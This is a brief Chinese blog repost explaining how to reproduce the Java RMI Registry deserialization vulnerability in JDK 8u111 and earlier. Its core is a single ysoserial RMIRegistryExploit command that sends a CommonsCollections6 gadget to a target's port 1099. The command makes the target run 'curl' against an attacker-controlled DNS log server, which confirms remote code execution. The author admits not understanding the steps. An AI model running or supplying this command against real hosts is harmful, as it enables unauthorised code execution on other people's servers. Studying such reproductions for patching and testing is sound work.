Java RMI Registry 反序列化漏洞(<=jdk8u111)
作者:互联网
漏洞复现
先去这http://www.dnslog.cn/搞个dns
然后用这个命令:
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
然后刷新dnslog
好兄弟们你们看懂了吗?反正我没懂
标签:www,序列化,Java,ysoserial,漏洞,dnslog,RMI,your 来源: https://blog.csdn.net/EC_Carrot/article/details/118437966